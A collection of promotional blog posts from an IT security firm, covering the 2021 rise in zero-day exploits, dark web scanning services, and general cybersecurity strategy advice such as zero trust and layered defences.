2021 has been an incredibly difficult year to protect your organization from cyber adversaries. It has been “The year of zero-Day exploit” with more vulnerabilities in the first 11 months of the year than ever recorded before. As we head into the end of the year and the holiday season. Black Diamond Solutions wanted to provide a few insights into the full year of zero-day events. 

• A tough year to manage IT – Whether you have an internal IT team, use an MSP, or a combination of both, the reliance on patches alone is just not enough. In particular, In circumstances where no patch is available, it is paramount that your security stack and team is ready to monitor, detect, and provide an immediate response to the earliest signs of threat.  
• Actions speak louder than… – Amidst the attacks of 2021, Security providers focused on rapid response and action led the charge on fighting back zero-day  vulnerabilities.  True security is more than detection and alerts – it’s about eliminating the threats so that IT teams and businesses can stay focused on their business.  
• Long dwell times are a thing of the past – If not addressed immediately, attacks from info stealers quickly spiral out of control. Once an adversary gains initial access, their main objective is to spread their reach and malware to cause as much cost to the victim as possible. Gone are the days of long dwell times. After breach, malicious actions occur within minutes.  
• Living off the land – Adversaries are increasingly using legitimate credentials to enter your environment. Then, using no malware at all, they ‘live off the land’. This means they leverage only native programs and tools available in the compromised environment to blend in before finally deploying their malware.  This makes detection extremely difficult for legacy tools such as anti-virus and anti-malware.

 Despite the challenges, Black Diamond Solutions appreciates your business in 2021, and we look forward to continually helping you, our clients, build and protect your IT environment in 2022.  

Our security operations center continues to offer diligent 24x7x365 managed detection and response to our security clients. We remain agile and vigilant, moving faster than the “bad actors” to keep your environment safe.  

Want to start out 2022 with a little more peace of mind regarding the security of your environment? 

Sign up for a FREE DEMO of our SOC capabilities!  

What is the “Dark Web”?

You probably have heard dark web scanning is a great way to prevent a data breach. But what does that even mean? The Dark Web is a part of the World Wide Web that uses darknets or overlays and is only accessible through specific software programs such as TOR browser. Unlike the surface web, the deep web is not indexed on search engines like Google and Bing. Using the Dark web, individuals on private networks can conduct business on dark web marketplaces and communicate anonymously without giving up identifying information such as location. A dark web marketplace serves as a digital black market allowing criminals to gain access of leaked data and personal information without the ability to be tracked down. Dark web sites conduct criminal activity through the sell and distribution of credit card details, medical records, passwords and other sensitive information. All being bought and sold relatively inexpensively. Worse, the information being sold, can be sold over and over again to many “dark agents” giving multiple potential hackers access to user accounts and other stolen data.

The loss of employee or company data can be devastating to an organization for multiple reasons. The costs of recovering it can be extraordinary, as well as the reputational losses if you legally or morally need to let your clients and vendors know you have experienced a breach.

This is why some organizations choose to run ongoing dark web scans for domains within their organization. Now, you might ask, “What exactly is dark web scanning?” Dark web scans are done by dark web scanners, which are tools designed to find data leaks across the entire dark web. Cyber professionals scan the dark web for full or partial amounts of sensitive information affiliated with your company’s domains and IP addresses. The types of items normally found are business usernames, personal passwords, business passwords as well as other business and personal information. By gathering information about what data is floating around the dark web your IT team or provider can easily make the needed changes both in security (changing user names or passwords for example) and company security policy (not allowing personal emails to be used for company business for example.)

Why is dark web scanning important?

Human error is one of the leading causes of data breaches, so it’s important to have layers of security in order to protect your company. A dark web scan can help you find and fix human errors before they become a problem. Additionally, cybercriminals are always looking for new ways to steal information, and not being covered on the dark web means they have the upper hand. Dark web scanners can not only monitor your company’s sensitive data but also fight against those who threaten your company’s existence!

Dark Web Scan Proactive Monitoring

Having a dark web monitoring service on a regular basis is a smart idea for the following reasons:

• With so much now dependent on a digital world, it is a very good idea to have your company domains proactively monitored and reported on. There are simply too many credentials out there and so even a small % of stolen data can cost a company immensely.
• By actively monitoring the dark web as it pertains to your domains and company, your IT team or provider, over time can significantly lower the amount and types of data that are getting leaked. This can be done through training of the end user as well as network settings that could restrict the types of end user activities that result in data dumps.

Comprehensive Reporting

In addition to running a dark web scan and learning about credentials on the dark web, getting a comprehensive dashboard report is a great feature of most dark web monitoring services. These reports show management data that is floating on the dark web, along with insights as to how data breaches occurred, allowing the IT team to react and set up additional security system policies and procedures based on real data. (see example report page below.)

Dark Web Scans | Final Considerations

It is pretty clear to see the benefits of dark web scanning for any organization. It is easier to fight an enemy knowing you have the upper hand than hope you can gain that upper hand back after an account takeover occurs. A trusted team of cyber security professionals can help you gain that upper hand and keep it with proactive dark web monitoring. This special software helps fight against those that threaten your company’s existence. By gathering information about your personal data floating around the dark web, and analyzing comprehensive reports with insights, your IT team is better equipped to prevent a future data breach.  If you’re concerned about this issue in your organization or want more information on dark web scanning, contact us today! We offer several security services designed to protect your personal information from leaking onto the dark web, so feel free to reach out with questions anytime!

I’ll spare you half a blog showcasing scary statistics around ransomware and cybersecurity. If you’re reading this, you’re well aware that data is valuable, and ransomware is a means of monetizing attacks against data. To put this into some minor perspective, as of late 2020, one in four attacks IBM Security X-Force Incident Response has remediated this year have been caused by ransomware. According to a recent post, ransomware incidents appeared to explode in June 2020. That month saw one-third of all the ransomware attacks IBM Security X-Force has remediated so far this year.

I’m sure you are aware of some of the more recent attacks against businesses, local communities, and even federal governments.

That said, this is honestly the perfect time to take a reflective look at your cybersecurity strategies. As someone who studies, researches, and works with different security strategies, there has been a shift in how organizations – large and small – are designing their security standards for the new decade. Here’s some feedback they’ve shared and some strategies that can help.

1. Zero trust should become your new standard. This isn’t a piece of technology or a single solution that creates the zero-trust standard. Instead, it’s an entire approach and philosophy to securing data and devices both inside and outside your network. Zero Trust is a security concept developed in 2010 that outlines that an organization must contextually verify anything and everything trying to connect to its systems before granting any access. The core belief is that organizations should not automatically trust anything inside or outside their perimeters. This is an excellent time to review your security measures to ensure you don’t have blanket policies governing vast amounts of data or devices.
2. Anyone and anything can be a target. Living in a digital age means that much more than your computer becomes a target. Everything from biometric data, IoT devices, connected systems, and even physical devices become a target. Contextual approaches to security mean understanding everything within your IT environment. This is a big reason why solutions like IT Asset Management are so critical. Modern ITAM solutions look far beyond physical devices. Be sure to know what’s on your network, where your data resides, and who has access.
3. Attacks can come without any notification or payloads. An attack could be a scan or an attempt to sit on your network for a while and listen. The goal of the intruder isn’t always to steal something. At least, not initially. Leveraging smarter systems that can isolate anomalous traffic can help.

   Furthermore, it’s essential to think about anything that can take down a network. This includes DDoS attacks, phishing, and other threats. Remember, the sophistication of the modern attacker goes way beyond data exfiltration. The motivation of a threat could be monetary, data-driven, or even political.

4. Don’t be complacent; try new security solutions. Layered security approaches are critical to creating a sound security environment. Let me give you a real-world security example. An attacker that’s motivated to get into your company will go to great lengths to find weaknesses. So, let’s assume you have a critical application in your environment. You keep this application up-to-date and locked down. But, this application runs as a virtual app on a virtualization layer. What happens if you miss an update on your hypervisor? Suddenly, access to paravirtualization tools or even subsystems becomes a reality and a threat. Diving even deeper, are you patching the systems on which your virtualization platform is running? If not, that’s yet another threat vector. Remember, an attack could be layers-deep. New security solutions include ‘zero trust,’ where you enact a new way of designing security.
5. Partner with organizations that have deep security capabilities. Deeper security capabilities could include researching the dark web for any of your credentials or intellectual property or undergoing vulnerability or pen testing against your environment. Traditional security technologies will only take you so far. Partners with more in-depth security tools can help deploy the right architecture based on your use-case, data, and users. Having a trusted set of eyes can help with an improved security posture when it comes to security.

Over these past few short years, our world dove headfirst into the digital realm. Throughout 2020, we quickly saw just how critical digital infrastructure could be. We also saw some of the largest DDoS attacks and some of the most ferocious ransomware infiltrations. Most of all, we noticed that anyone could be a target. Single attackers, groups of bad guys, and even nation-states are highly motivated to get after your data.

If you’ve been ‘doing the same thing’ for the past couple of years with only minor upgrades, you need to rethink this strategy. For example, do you have automated patching going on? How locked down are your remote users? How well do you know the location of all of your IT or connected assets? Any lapse here would make you open to an attack.

Another critical point revolves around modernization efforts. Just because a piece of equipment still works doesn’t mean it’s bringing you value. Worse yet, it could create a lapse in security. Many organizations don’t want to upgrade that server or refactor that application because of the cost and undertaking. They also don’t realize just how much worse it’ll be if those systems become breached.

No one wants to wake up on a Monday morning to find that they’ve been the victim of a data breach or ransomware attack. Take this opportunity to have a ‘roaring’ security plan as you enter the roaring 20s.